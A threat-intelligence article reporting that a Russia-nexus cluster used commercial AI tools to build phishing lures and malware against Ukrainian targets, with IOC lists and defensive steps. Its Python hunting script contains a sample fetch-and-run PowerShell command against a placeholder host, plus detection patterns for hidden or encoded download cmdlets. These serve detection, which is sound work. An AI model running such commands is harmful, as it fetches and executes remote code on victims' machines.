GreyVibe, a Russia-nexus threat cluster first identified by cybersecurity firm WithSecure in January 2026, has been using ChatGPT, Google Gemini, and Ideogram AI to generate phishing lures and develop malware targeting Ukrainian military personnel, government agencies, energy infrastructure, and emergency services. The full WithSecure Labs report, published May 28, 2026, makes GreyVibe one of the first documented cases in which forensic evidence confirms AI tool use across both social engineering and malware development within a single threat actor's pipeline. Five distinct campaigns, three malware families, and four custom obfuscators are detailed — with LLM (Large Language Model — AI systems like ChatGPT or Gemini that generate text, images, and code from prompts) fingerprints identifiable in generated lure images and assessed in the malware source code itself.
// 01 GreyVibe: Technical Details
WithSecure classifies GreyVibe as a Russia-nexus threat cluster — distinct from a formally designated APT (Advanced Persistent Threat — a sophisticated, often state-linked hacking group that conducts long-running, targeted espionage or disruption operations). Researchers describe the group as "low-to-moderately sophisticated," lacking the operational discipline of mature nation-state actors, though their use of AI tools substantially raises their effective output.
Attribution indicators pointing to Russian origin include:
- Malware admin panels and code comments written in Russian
- C2 (Command-and-Control — the server infrastructure attackers use to remotely manage compromised systems and receive stolen data) servers configured to UTC+3 (Moscow Standard Time)
- Activity patterns and targeting aligned with Russian strategic interests against Ukraine
- Early GreyVibe samples share a unique ISO builder with UAC-0098 — a threat cluster composed of former TrickBot and Conti ransomware operators who pivoted to targeting Ukraine following Russia's full-scale invasion in February 2022
The group's most significant documented innovation is its confirmed use of commercial AI tools. WithSecure researcher Mohammad Kazem Hassan Nejad identified literal LLM watermarking artifacts embedded in phishing lure images — a forensic indicator that the images were generated by ChatGPT's DALL-E or a comparable model, rather than crafted manually or sourced from stock photography. The LegionRelay PowerShell RAT (Remote Access Trojan — malware that grants attackers remote control of an infected system) was assessed as likely substantially or fully developed with AI coding assistance, based on code style patterns inconsistent with typical human authorship.
GreyVibe also deployed four custom obfuscators — tools that scramble malware code to prevent security scanners from recognizing it — with LLM assistance:
- LOOKVALPS — obfuscates PowerShell payloads
- LOOKVALJS — obfuscates JavaScript loaders
- DAYLIGHT and TEASOUP — additional obfuscation layers applied before delivery
YARA detection rules (a pattern-matching language used by security tools to identify malware) for all four obfuscators and all malware families have been published by WithSecure on GitHub.
// 02 Exploitation Status and Threat Landscape
GreyVibe does not exploit software vulnerabilities — no CVEs (Common Vulnerabilities and Exposures — a standardized catalog of publicly disclosed software flaws) are associated with this threat cluster. All initial access is achieved through social engineering: the group invests heavily in AI-generated, realistic lure content to trick targets into running malicious code voluntarily.
Five named campaigns were active between August 2025 and May 2026:
PhantomMail employs spearphishing emails (MITRE ATT&CK T1566.001 — Phishing: Spearphishing Attachment) delivering malicious ZIP/RAR archives via Google Drive and 4sync file-hosting links. Decoy PDFs impersonate Ukrainian government agencies, emergency services (DSNS — Ukraine's State Emergency Service), energy companies, and telecom providers. The malware executes silently while the decoy document displays normally.
PhantomClick deploys fake CAPTCHA and ClickFix pages impersonating Zoom conferencing and LAPAS (Ukraine's government portal). Victims see a "Cloudflare verification" prompt that instructs them to run a PowerShell command (T1059.001 — Command and Scripting Interpreter: PowerShell). This "living off the land" technique uses Windows' built-in scripting engine, leaving minimal malware artifacts on disk and defeating signature-based detection.
PrincessClub operates fake Ukrainian adult and dating websites that deliver both FallSpy (Android spyware) and PhantomRelay/LegionRelay (Windows RATs). Operators ran fake female Telegram personas to build trust with targets over extended periods. A particularly novel tactic: operators used WebRTC (Web Real-Time Communication — a browser API enabling live audio and video) to conduct surveillance of targets during live video calls without requiring any software installation on the victim's device.
DroneLink built fake Ukrainian military charity websites themed around FPV (First-Person View) drone operators and UAV (Unmanned Aerial Vehicle) fundraising. The campaign targeted military personnel and drone support networks, sharing infrastructure with PrincessClub — indicating the same operator cell ran both.
Nebo deployed fake Russian-language military communications login pages designed to harvest credentials from Ukrainian personnel attempting to access Russian communications platforms — a direct military intelligence collection operation.

// 03 Who Is Affected
GreyVibe's confirmed targeting is concentrated in Ukraine, with particular emphasis on the Kharkiv region — the front-line oblast closest to active Russian offensive operations. Targeted populations include:
- Ukrainian military personnel — drone operators, FPV unit members, soldiers accessing communications infrastructure
- Government agency employees — impersonated agencies include DSNS (emergency services), customs, and civil protection offices
- Energy sector workers — Centrenergo impersonation in PhantomMail samples indicates grid and power plant targeting
- Telecom employees — industry-specific lures documented in PhantomMail
- General Ukrainian civilians — via fake dating sites (PrincessClub), harvesting personal data that may feed targeting intelligence
While confirmed activity is Ukraine-focused, GreyVibe's AI-assisted lure generation pipeline can be retargeted to other geographies with minimal operator effort. The no-code AI approach makes geographic or sector pivots trivially easy.
// 04 What You Should Do Right Now
- Import WithSecure's YARA rules from the WithSecure GitHub repository. Rules cover DAYLIGHT, TEASOUP, LOOKVALPS, LOOKVALJS, all three PhantomRelay variants, LegionRelay, and FallSpy — providing full coverage of the GreyVibe malware portfolio.
- Block GreyVibe C2 domains at your perimeter. Confirmed C2 domains include goodhillsenterprise.com, ny-car-dealership.it.com, doct0rsim.com, routinesyscheckup.com, serotoninenterprise.com, newstarcommunity.com, and jackscommunications.com. The full IOC list, including 19 C2 domains, is in the WithSecure IOC repository.
- Block phishing infrastructure domains. PhantomClick uses lapas.live, zoomconference.click, and zoomconference.app. PrincessClub uses princess-mens.fun, princessclub.click, princessclub.best, and related domains. DroneLink fake charities include frontforce.org, ukrguard.org, ukrbezpeka.online, ironbrave.online, and ukrvarta.online.
- Null-route GreyVibe C2 IP addresses. Known C2 IPs: 188.124.59.120, 193.233.23.81, 89.37.185.60, 74.112.102.120, 194.87.128.243, 194.87.108.110, 89.125.189.118, 89.125.189.85, 91.149.221.124.
- Train users specifically on ClickFix and fake-CAPTCHA PowerShell lures. PhantomClick relies entirely on the victim manually running a PowerShell command after a fake browser prompt. No exploit is involved — only social engineering. Security awareness training targeting this specific technique is more effective here than technical controls.
- Monitor for LegionRelay persistence artifacts. Alert on scheduled tasks executing any of the following scripts: RzTelemetry.ps1, SysCheckupService.ps1, SystemHealthSvc.ps1, WUDFHost.ps1, amd.ps1, backup.ps1. These are documented LegionRelay persistence filenames. Correlate with outbound REST API connections to unrecognized domains.
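The two host-side checks above (the PhantomClick ClickFix execution pattern and the LegionRelay scheduled-task filenames) as a small hunting script. This is an added example, not WithSecure's code or rules: the event records are constructed, simplified versions of Windows Security 4698 and Sysmon Event ID 1, and the ClickFix command-line flags are a general assumption about pasted "verification" commands, not something the report documents.

```python
"""Hunt for GreyVibe artifacts in constructed Windows telemetry (added example)."""
import re

# Persistence script names documented for LegionRelay (from the report).
LEGIONRELAY_SCRIPTS = {
    "rztelemetry.ps1", "syscheckupservice.ps1", "systemhealthsvc.ps1",
    "wudfhost.ps1", "amd.ps1", "backup.ps1",
}
# Shape of a pasted ClickFix command: hidden window, encoded command or a
# web download cmdlet. Assumption for the example, not taken from the report.
CLICKFIX_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b)", re.I)

def task_hits(event):
    """Return the LegionRelay script names referenced by a 4698 task action."""
    action = event.get("action", "").lower()
    return sorted(s for s in LEGIONRELAY_SCRIPTS if s in action)

def is_clickfix_exec(event):
    """True when powershell.exe is spawned by explorer.exe with ClickFix-shaped args."""
    image = event.get("image", "").lower()
    parent = event.get("parent_image", "").lower()
    if not image.endswith("powershell.exe") or not parent.endswith("explorer.exe"):
        return False
    return bool(CLICKFIX_FLAGS.search(event.get("command_line", "")))

def hunt(events):
    """Return (event id, reason) for every event that matches a check."""
    findings = []
    for ev in events:
        if ev["type"] == "4698":
            for script in task_hits(ev):
                findings.append((ev["id"], f"LegionRelay persistence task -> {script}"))
        elif ev["type"] == "sysmon1" and is_clickfix_exec(ev):
            findings.append((ev["id"], "ClickFix-style PowerShell from explorer.exe"))
    return findings

# Constructed sample telemetry: one persistence task, one pasted command, two benign events.
SAMPLE_EVENTS = [
    {"id": 1, "type": "4698", "task": "\\SysCheckup",
     "action": "powershell.exe -ep bypass -f C:\\Users\\Public\\SysCheckupService.ps1"},
    {"id": 2, "type": "sysmon1", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "powershell -w hidden -c \"irm https://verify.example/x | iex\""},
    {"id": 3, "type": "4698", "task": "\\Backup\\Nightly", "action": "C:\\Tools\\backup.exe --full"},
    {"id": 4, "type": "sysmon1", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe", "command_line": "powershell -File C:\\Scripts\\deploy.ps1"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit)
```

Feed it real 4698 and Sysmon records mapped onto the same keys, and pair any hit with the outbound connections from that host as the report recommends.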
// 05 Background: Understanding the Risk
The operational significance of GreyVibe is not its sophistication level — it is, as WithSecure acknowledges, a "low-to-moderately sophisticated" cluster. The significance is the forensically confirmed use of AI tools across both the social engineering pipeline and malware development, documented for the first time in a public threat research report.
Before 2026, claims of AI-assisted cyberattacks were largely speculative or based on indirect evidence. Google's Threat Intelligence Group reported in February 2026 that multiple state-backed actors were using Gemini for attack research. GreyVibe is the first case where LLM artifact markers in attack images — not operator claims — forensically confirm commercial AI use. This is a methodological milestone in threat attribution.
The PrincessClub campaign's use of WebRTC live-video calls on fake dating sites represents a distinct escalation: conducting real-time audio and visual surveillance of targets without installing any software on the victim's device defeats all endpoint detection. Traditional malware analysis, behavioral sandboxing, and EDR (Endpoint Detection and Response — software monitoring devices for suspicious activity) have no visibility into a video call. The defense against this technique is human awareness, not technology.
The connection to UAC-0098 — former TrickBot and Conti ransomware operators now redirected toward Ukrainian targets — illustrates a documented Russian strategic pattern: tasking former criminal organizations as low-cost, deniable cyber operators during active conflict. This model has precedents in the Sandworm and EvilCorp cases and suggests GreyVibe's operators may have direct or indirect ties to Russian intelligence structures.
GreyVibe's five campaigns collectively targeted virtually every layer of Ukrainian society relevant to the conflict: military operators, government administrators, critical infrastructure workers, and civilians. The breadth of targeting, combined with AI-assisted scale, positions this cluster as a persistent intelligence collection threat that will likely outlast the current conflict phase.
// 06 Conclusion
GreyVibe represents the first forensically documented case of AI-generated lures and AI-coded malware within a single threat cluster's active operational pipeline, running against Ukrainian military and infrastructure targets since at least August 2025. Security teams — especially those supporting Ukrainian operations, EU organizations, or NATO partners — should immediately import WithSecure's YARA rules, block the listed IOCs, and prioritize user training on ClickFix-style PowerShell execution lures. The attack chain depends entirely on human error, not software vulnerabilities, making awareness the most effective mitigation available today.
For any query contact us at contact@cipherssecurity.com
